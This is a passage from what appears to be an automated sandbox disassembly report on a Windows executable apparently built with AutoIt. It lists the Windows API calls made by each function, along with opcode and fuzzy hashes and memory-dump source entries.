                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3311875123-0
                                                                                                                                                          • Opcode ID: f50705fdac22b84007e2d6ca098b5f4bdc181e24cc413bc6ff4e345fe8c018a6
                                                                                                                                                          • Instruction ID: 8048752fc7d3088602920e2ecd911b5830c02de363d6b8c05d9713cb2b480e96
                                                                                                                                                          • Opcode Fuzzy Hash: f50705fdac22b84007e2d6ca098b5f4bdc181e24cc413bc6ff4e345fe8c018a6
                                                                                                                                                          • Instruction Fuzzy Hash: 4D51F370A00B49EFDF24CF68CC88BADBBF6BF15318F544119E4569B290E3B09964CB51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0013B1C1
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0013B225
                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0013B242
                                                                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0013B253
                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0013B29D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1827037458-0
                                                                                                                                                          • Opcode ID: b0691ce478b802b5ed327714ae24abd24119ba83ab32311ae1feb6fecc0bfda4
                                                                                                                                                          • Instruction ID: 209d9ec0b6dd18d5b2a3675e9887915295528897bc5ccb7b5411c6422200386d
                                                                                                                                                          • Opcode Fuzzy Hash: b0691ce478b802b5ed327714ae24abd24119ba83ab32311ae1feb6fecc0bfda4
                                                                                                                                                          • Instruction Fuzzy Hash: CA41AF70104700AFDB11DF64DCC4FAA7BE8EB56320F040669FAA5C76A1D731A885DB62
                                                                                                                                                          APIs
                                                                                                                                                          • ShowWindow.USER32(001E1810,00000000,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E21B
                                                                                                                                                          • EnableWindow.USER32(?,00000000), ref: 0018E23F
                                                                                                                                                          • ShowWindow.USER32(001E1810,00000000,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E29F
                                                                                                                                                          • ShowWindow.USER32(?,00000004,?,?,001E1810,001E1810,?,0019E2D6), ref: 0018E2B1
                                                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 0018E2D5
                                                                                                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0018E2F8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                          • Opcode ID: 7a49798010087443a9e3eded4bc7826c2ce7b9a385cbf13e37fe4c8be8d58e78
                                                                                                                                                          • Instruction ID: 9997b909ff0a227be6349da8b3beb4fe3bc888dcefea318e6d7c18e5e5b599ed
                                                                                                                                                          • Opcode Fuzzy Hash: 7a49798010087443a9e3eded4bc7826c2ce7b9a385cbf13e37fe4c8be8d58e78
                                                                                                                                                          • Instruction Fuzzy Hash: 65418E34600545EFDB26EF28C499B947BF6BF0A304F1841B9FA598F6A2C732A941CF51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001284A6: __swprintf.LIBCMT ref: 001284E5
                                                                                                                                                            • Part of subcall function 001284A6: __itow.LIBCMT ref: 00128519
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • _wcstok.LIBCMT ref: 00171D6E
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00171DFD
                                                                                                                                                          • _memset.LIBCMT ref: 00171E30
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                          • String ID: X
                                                                                                                                                          • API String ID: 774024439-3081909835
                                                                                                                                                          • Opcode ID: c1055990219fc72d92a8ef1e8d4d366e67470399147f54854990d0d5cadf9012
                                                                                                                                                          • Instruction ID: 59c8d12f4e08828d1ba3cba2846637568162bb74aeb5e3815e6fe3b8edd8d67b
                                                                                                                                                          • Opcode Fuzzy Hash: c1055990219fc72d92a8ef1e8d4d366e67470399147f54854990d0d5cadf9012
                                                                                                                                                          • Instruction Fuzzy Hash: 1CC18031508310AFC714EF28D991A5EB7F4BF95310F00892DF99A972A2EB30ED55CB92
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013B5EB
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B5FA
                                                                                                                                                            • Part of subcall function 0013B58B: BeginPath.GDI32(?), ref: 0013B611
                                                                                                                                                            • Part of subcall function 0013B58B: SelectObject.GDI32(?,00000000), ref: 0013B63B
                                                                                                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0018E9F2
                                                                                                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 0018EA06
                                                                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EA14
                                                                                                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 0018EA24
                                                                                                                                                          • EndPath.GDI32(00000000), ref: 0018EA34
                                                                                                                                                          • StrokePath.GDI32(00000000), ref: 0018EA44
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                          • Opcode ID: 9be8f7a58efb36365189cd42dc9b0d6cdecc07daf59624c192c7bc6120d7fd4a
                                                                                                                                                          • Instruction ID: 23b1f3db5e948c3e12c6e51e07879ce0f49d95f24fd24f597999792a8ff1dc2a
                                                                                                                                                          • Opcode Fuzzy Hash: 9be8f7a58efb36365189cd42dc9b0d6cdecc07daf59624c192c7bc6120d7fd4a
                                                                                                                                                          • Instruction Fuzzy Hash: 23110976000149BFDF069F90EC88E9A7FADEB09354F048011FA1A4A560D7719E95DBA0
                                                                                                                                                          APIs
                                                                                                                                                          • GetDC.USER32(00000000), ref: 0015EFB6
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0015EFC7
                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0015EFCE
                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0015EFD6
                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0015EFED
                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0015EFFF
                                                                                                                                                            • Part of subcall function 0015A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0015A79D,00000000,00000000,?,0015AB73), ref: 0015B2CA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 603618608-0
                                                                                                                                                          • Opcode ID: 03fd275a63763c51fdf6f93a90d6f717605c4f200dee4ee8d0c0a095cbc51a14
                                                                                                                                                          • Instruction ID: 2ad20a56afded039808297d27bfcd29a6f0d0a61babc1e6796d4cb5933d4eb34
                                                                                                                                                          • Opcode Fuzzy Hash: 03fd275a63763c51fdf6f93a90d6f717605c4f200dee4ee8d0c0a095cbc51a14
                                                                                                                                                          • Instruction Fuzzy Hash: 7F01A7B5E00705BFEB109BA59C45B5EBFB8EF49351F044066FE09AB690D6709D00CF61
                                                                                                                                                          APIs
                                                                                                                                                          • __init_pointers.LIBCMT ref: 001487D7
                                                                                                                                                            • Part of subcall function 00141E5A: __initp_misc_winsig.LIBCMT ref: 00141E7E
                                                                                                                                                            • Part of subcall function 00141E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00148BE1
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsAlloc), ref: 00148BF5
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsFree), ref: 00148C08
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsGetValue), ref: 00148C1B
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlsSetValue), ref: 00148C2E
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00148C41
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateSemaphoreExW), ref: 00148C54
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00148C67
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00148C7A
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadpoolTimer), ref: 00148C8D
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00148CA0
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00148CB3
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CreateThreadpoolWait), ref: 00148CC6
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,SetThreadpoolWait), ref: 00148CD9
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,CloseThreadpoolWait), ref: 00148CEC
                                                                                                                                                            • Part of subcall function 00141E5A: 6CA06DE0.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00148CFF
                                                                                                                                                          • __mtinitlocks.LIBCMT ref: 001487DC
                                                                                                                                                            • Part of subcall function 00148AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(001DAC68,00000FA0,?,?,001487E1,00146AFA,001D67D8,00000014), ref: 00148AD1
                                                                                                                                                          • __mtterm.LIBCMT ref: 001487E5
                                                                                                                                                            • Part of subcall function 0014884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 001489CF
                                                                                                                                                            • Part of subcall function 0014884D: _free.LIBCMT ref: 001489D6
                                                                                                                                                            • Part of subcall function 0014884D: RtlDeleteCriticalSection.NTDLL(001DAC68), ref: 001489F8
                                                                                                                                                          • __calloc_crt.LIBCMT ref: 0014880A
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00148833
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3163737558-0
                                                                                                                                                          • Opcode ID: 9c0dd0ef0d079f016bf435e48aec9e96ec741a21ca4faa1c0842df99e6db4839
                                                                                                                                                          • Instruction ID: 9753782a9125ca31ee86f2009ee806da866ae0a0d603ae1914a623d839c561f2
                                                                                                                                                          • Opcode Fuzzy Hash: 9c0dd0ef0d079f016bf435e48aec9e96ec741a21ca4faa1c0842df99e6db4839
                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0BE3311A7526AE2247B7CBC07A9E3AC0CF21B35B710A2EF464D60F2FF5088814160
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1423608774-0
                                                                                                                                                          • Opcode ID: 04f556ce44da2b0a6de2fb49a456b462391b9820ce5146eac9086a887a4d8c67
                                                                                                                                                          • Instruction ID: c9de14e2571e5649aa2c3f2c2792548fa3069d2af68dcb7d26e23c49916124ef
                                                                                                                                                          • Opcode Fuzzy Hash: 04f556ce44da2b0a6de2fb49a456b462391b9820ce5146eac9086a887a4d8c67
                                                                                                                                                          • Instruction Fuzzy Hash: 8001A932101611DBD7152B64FD48EEB77B9FF8A702B80052AF503A2D61DB74AC50CF51
                                                                                                                                                          APIs
                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00121898
                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 001218A0
                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001218AB
                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001218B6
                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 001218BE
                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 001218C6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                          • Opcode ID: 663e7c1a32f815f90124eccbb447fd5e5f20cef206df6e10d48ba024e0f0e09a
                                                                                                                                                          • Instruction ID: 17d064420b189dd7efcdd1937ae77b7c6abc925f634865bbf028c978ab3d81f2
                                                                                                                                                          • Opcode Fuzzy Hash: 663e7c1a32f815f90124eccbb447fd5e5f20cef206df6e10d48ba024e0f0e09a
                                                                                                                                                          • Instruction Fuzzy Hash: 5D0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00168504
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0016851A
                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00168529
                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168538
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168542
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00168549
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                          • Opcode ID: db7168b735eea61a50b9c8c2c9f47ed04266aff431121c682500ace14aea86b9
                                                                                                                                                          • Instruction ID: 84eee40f881ebb47cec8c171d03927366aca7cda22bcd9169e5992f4570f69dc
                                                                                                                                                          • Opcode Fuzzy Hash: db7168b735eea61a50b9c8c2c9f47ed04266aff431121c682500ace14aea86b9
                                                                                                                                                          • Instruction Fuzzy Hash: C6F0B472240558BBE7201762AD0EEEF3E7CDFC7B11F000058F606D1850E7A02A81C6B4
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0016A330
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 0016A341
                                                                                                                                                          • TerminateThread.KERNEL32(?,000001F6,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 0016A34E
                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 0016A35B
                                                                                                                                                            • Part of subcall function 00169CCE: CloseHandle.KERNEL32(?,?,0016A368,?,?,?,001966D3,?,?,?,?,?,0012E681), ref: 00169CD8
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0016A36E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 0016A375
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                          • Opcode ID: de7f87a2c360b80c10f4ef0dd621765e54e6aee7c5afb8f8222f9e010f0184c0
                                                                                                                                                          • Instruction ID: 6d65113c6de87997891fb59d12d4dbff97dfc626bd97dd46de0a9f2d3d5e9716
                                                                                                                                                          • Opcode Fuzzy Hash: de7f87a2c360b80c10f4ef0dd621765e54e6aee7c5afb8f8222f9e010f0184c0
                                                                                                                                                          • Instruction Fuzzy Hash: CFF08272141A11ABD7112B64FD4CEEB7B79FF8A302F400522F203A5DA1DBB59891DB51
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                            • Part of subcall function 0012BBD9: _memmove.LIBCMT ref: 0012BC33
                                                                                                                                                          • __swprintf.LIBCMT ref: 0013D98F
                                                                                                                                                          Strings
                                                                                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0013D832
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                          • API String ID: 1943609520-557222456
                                                                                                                                                          • Opcode ID: 043ae75d18c261dfa02b2fa1e0a09e03a8340335a1cdeab7808049f6978e4c42
                                                                                                                                                          • Instruction ID: 5c5bf1a9d0bd419dbac5e5cd71fac3dc0f6ac09c79943addf18bbebb2056ebdb
                                                                                                                                                          • Opcode Fuzzy Hash: 043ae75d18c261dfa02b2fa1e0a09e03a8340335a1cdeab7808049f6978e4c42
                                                                                                                                                          • Instruction Fuzzy Hash: 18917A711083119FCB14EF24E886D6EB7A9FFA9700F01495DF5969B2A1EB30EE14CB52
                                                                                                                                                          APIs
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0017B4A8
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 0017B5B7
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0017B73A
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantInit.OLEAUT32(00000000), ref: 0016A736
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantCopy.OLEAUT32(?,?), ref: 0016A73F
                                                                                                                                                            • Part of subcall function 0016A6F6: VariantClear.OLEAUT32(?), ref: 0016A74B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                          • API String ID: 4237274167-1221869570
                                                                                                                                                          • Opcode ID: ad42ba562d2f982c64302fcd2c909302f720451bb4d5dc543d72f380c0f81773
                                                                                                                                                          • Instruction ID: d61ca7ca594c595302831313f7a22c530edb0db01eb1411adc487a682b80643b
                                                                                                                                                          • Opcode Fuzzy Hash: ad42ba562d2f982c64302fcd2c909302f720451bb4d5dc543d72f380c0f81773
                                                                                                                                                          • Instruction Fuzzy Hash: CF918C746083019FCB14DF24D485A5ABBF4EF99710F14886EF88A9B362DB31E945CB52
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00123BCF: _wcscpy.LIBCMT ref: 00123BF2
                                                                                                                                                          • _memset.LIBCMT ref: 00165E56
                                                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 00165E85
